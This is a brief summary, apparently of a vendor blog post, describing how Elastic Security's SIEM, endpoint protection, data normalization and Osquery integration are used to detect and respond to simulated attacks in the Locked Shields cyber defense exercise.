How Elastic Security is used in Locked Shields — one of the worlds largest cyber defense exercises (part 2)

Locked Shields, one of the largest cyber defense exercises, offers a realistic simulation of cyber warfare through a comprehensive series of attack simulations on the fictitious country of Berylia. The exercise emphasizes the capabilities of Elastic Security, including SIEM and Endpoint Security, in detecting and preventing cyber threats. Participating teams employ the "left and right of boom" strategy, focusing on both prevention and response to cyber incidents. Elastic's setup during the exercise involves data collection, normalization through the Elastic Common Schema, and integration with tools like Osquery for enhanced threat detection and response. The exercise highlights common tactics such as defense evasion and "living off the land" techniques, demonstrating realistic attack anatomies mapped to the MITRE ATT&CK framework. Locked Shields underscores the importance of cybersecurity hygiene, collaboration among teams, and the role of human factors in cyber defense, while showcasing Elastic Security's potential to thwart complex attacks effectively.